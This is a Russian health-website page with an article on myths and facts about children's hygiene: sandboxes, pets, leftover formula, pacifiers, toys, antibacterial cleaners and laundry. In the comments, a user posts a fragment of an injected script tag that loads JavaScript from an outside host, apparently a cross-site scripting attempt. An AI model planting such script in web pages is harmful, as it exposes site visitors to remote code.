Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Мифы и факты о детской ги...  >>  Мифы и факты о детской гигиене
 
Обратная связь
 

Мифы и факты о детской гигиене

Размер шрифта
31 января 2011 00:00
  • google_analytics: false
  • Нравится

Став мамой, вы обнаружили, что привычные меры гигиены совершенно не соответствуют вашему новому статусу. Теперь вы одержимо чистите весь дом каждый день, не пропуская даже пространство под плинтусом. А как только ваш порог переступают друзья, с пристрастием следователя интересуетесь их личными привычками гигиены.

Не заходите слишком далеко, ведь, как утверждают ученые, большинство микробов безопасно и, более того, полезно. Их заслуга состоит в том, что они помогают нашей иммунной системе совершенствоваться в борьбе с вирусами и вредными микроорганизмами. Вот несколько мифов и фактов о гигиене, которые помогут вам сэкономить время и силы.

ПРАВИЛО ФАНАТОВ ЧИСТОТЫ №1. Руки прочь от ребенка, если ты их не помыл.

РЕАЛЬНО Безусловно, новорожденный ребенок должен расти в чистоте и порядке. Те, кто пришел к вам домой обязаны тщательно помыть руки с мылом, прежде чем дотронуться до крохи, потому что его незрелая иммунная система пока очень восприимчива к холоду и инфекциям. Но нет никакой потребности заставлять всех домочадцев то и дело обрабатывать руки антимикробным гелем и мыть их с дезинфицирующим средством. Дело в том, что новорожденный не такой уязвимый как кажется на первый взгляд. Все без исключения малыши, еще находясь в утробе, получают от своих мам антитела, которые частично защищают их от вирусов и бактерий после рождения. Только когда ребенку будут сделаны прививки, у него появятся собственные антитела к микробам и вирусам.

ПРАВИЛО ФАНАТОВ ЧИСТОТЫ №2. Ребенку нельзя играть в общей песочнице.

РЕАЛЬНО Если дети рассматривают песочницу как свой собственный частный пляж, то кошки и собаки считают ее общественным лотком. Если ребенок, играя, потянет пальцы в рот, он может заразиться глистами и другими паразитами, яйца которых с животными экскрементами попали в песок. А там и до болезней недалеко. Так, круглые черви становятся причиной лихорадки и болей в животе, другие паразиты приводят к болезненным инфекциям кожи и диарее. Всегда носите с собой антибактериальные салфетки и вытирайте ими руки малыша после игры. А при первой же возможности помойте их хорошенько с мылом.

ПРАВИЛО ФАНАТОВ ЧИСТОТЫ №3. Никаких объятий с животными.

РЕАЛЬНО Если у вашего ребенка нет открытой раны, даже грязная собака не повод для беспокойства. Однако следите за тем, чтобы животное не облизывала ребенка, ведь если она заражена паразитами, они могут быть у нее во рту и со слюной попасть на ребенка. После общения с животными тщательно вымойте малышу руки.

ПРАВИЛО ФАНАТОВ ЧИСТОТЫ №4. Оставшуюся еду и молочную смесь нужно выбрасывать.

РЕАЛЬНО Не выбрасывайте продукты, которых не касалась ложка ребенка. Дело в том, что пищеварительные ферменты слюны разрушают еду и заставляют ее быстрее портиться. Поэтому выливайте из баночки в детскую посуду столько еды, сколько нужно на один раз. Остатки смеси безопасны для малыша в течение двух часов, если бутылочка не стоит в жарком помещении. А грудное молоко ребенок может пить в течение 10 часов с момента сцеживания.

ПРАВИЛО ФАНАТОВ ЧИСТОТЫ №5. Фрукты и овощи – даже предварительно вымытые – перед употреблением нужно снова помыть.

РЕАЛЬНО Когда дело доходит до приготовления пищи, нужно быть особенно осторожными. Даже предварительно вымытые продукты, «готовые к употреблению», могут быть загрязнены, на них могут остаться бактерии и пестициды. Чтобы удалить ненужное, помойте фрукты и овощи щеткой, затем обсушите чистой тканью или бумажным полотенцем. Не забудьте мыть руки, посуду, и кухонные поверхности горячей, мыльной водой после обработки продуктов, чтобы избежать загрязнения остальной еды.

ПРАВИЛО ФАНАТОВ ЧИСТОТЫ №6. Вы моете пустышку ребенка каждый раз, после того как она упадет на пол.

РЕАЛЬНО Некоторые мамы шутят о «пятисекундном правиле» – мол, поднятое с пола в течение пяти секунд не считается упавшим. Ерунда – достаточно и секунды, чтобы соска стала причиной заражения сальмонеллой и другими паразитами. Микрочастички пищи, упавшие на пол, мгновенно осаждаются бактериями, и становятся настоящим рассадником для микроорганизмов. Поэтому, соприкоснувшись с мельчайшими крошками, пустышка также будет заражена. Всегда лучше промыть упавшую соску горячей водой с мылом и только после этого отдать ее ребенку.

ПРАВИЛО ФАНАТОВ ЧИСТОТЫ №7. Еженедельно мыть игрушки.

РЕАЛЬНО Микробы могут жить на игрушках очень долго. Поэтому те игрушки, с которыми чаще всего контактирует ребенок, нужно мыть регулярно. Совсем несложно дезинфицировать вещи малыша – от пластмассовых погремушек до подносика от детского стульчика. Растворите в воде немного дезинфицирующего средства без резкого запаха и прополощите там предметы. А столик, за которым кушает ваш малыш, тщательнейшим образом вытирайте после каждого приема пищи.

ПРАВИЛО ФАНАТОВ ЧИСТОТЫ №8. Во всем доме использовать антибактериальные средства, чтобы держать микробы в страхе.

ПРОВЕРКА В РЕАЛЬНЫХ УСЛОВИЯХ Злоупотребление антибактериальными продуктами может привести к тому, что микробы станут устойчивы к таким средствам. Более того, пары химических веществ вредны для здоровья. Особенно восприимчивы к таким запахам дети. Вместо того чтобы чистить весь дом каждый день специальными порошками, акцентируйтесь на кухне и ванной. Эти территории в доме – рекордсмены по числу бактерий. Здесь сильнодействующим средствам самое место. Всю остальную площадь можно очистить старым проверенным способом – мыльной водой. Согласно недавнему исследованию, в течение 10 секунд она удаляет 90% всех известных микробов.

ПРАВИЛО ФАНАТОВ ЧИСТОТЫ №9. Детскую одежду нужно стирать отдельно от взрослой.

РЕАЛЬНО Как только ваш ребенок проходит «новорожденную» стадию, с ней же существенно снижается опасность появления аллергии на моющие средства. Поэтому нет никакой причины стирать детские вещи отдельно от взрослых. Исключение – если в семье у кого-то есть глисты, кто-то болен гриппом или страдает кожными инфекциями. Все потому что некоторые бактерии и вирусы способны пережить стандартные циклы стирки. Чтобы обезопасить себя, стирайте одежду больного члена семьи отдельно, используя отбеливатель и самый высокий температурный режим. Обязательно гладьте с двух сторон детские вещи, эта процедура убивает любых микробов. Чтобы препятствовать размножению микробов в стиральной машинке, ежемесячно ставьте ее пустой (без белья) пройти один цикл на самом высоком температурном режиме.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 21:31

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

01 июля 2015 в 00:22

Комментарий удален за нарушение Правил общения

3 - Гость

18 июля 2015 в 16:22

Комментарий удален за нарушение Правил общения

Статьи

       
Правила безопасности в ванной   Что имеем – не храним   Домашние паразиты – как с ними бороться   Братец кролик  
03 октября 2013Результаты благотворительного марафона «Всем миром» 17 июля 2013Будет ли ваш ребенок толстым – теперь это можно понять уже в 2 месяца!
 
10 июля 2013От того, что ест беременная женщина, зависит ум ее ребенка 08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты
 

Слайдшоу

1
Как действительно избавиться от всех микробов. Часть 1
Как остаться сухой, и не вспотеть
Как мыть лицо, чтобы быть красивой?

Тесты

Средства личной гигиены
Что вы знаете о грудном вскармливании?
Что вы знаете об СДВГ?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.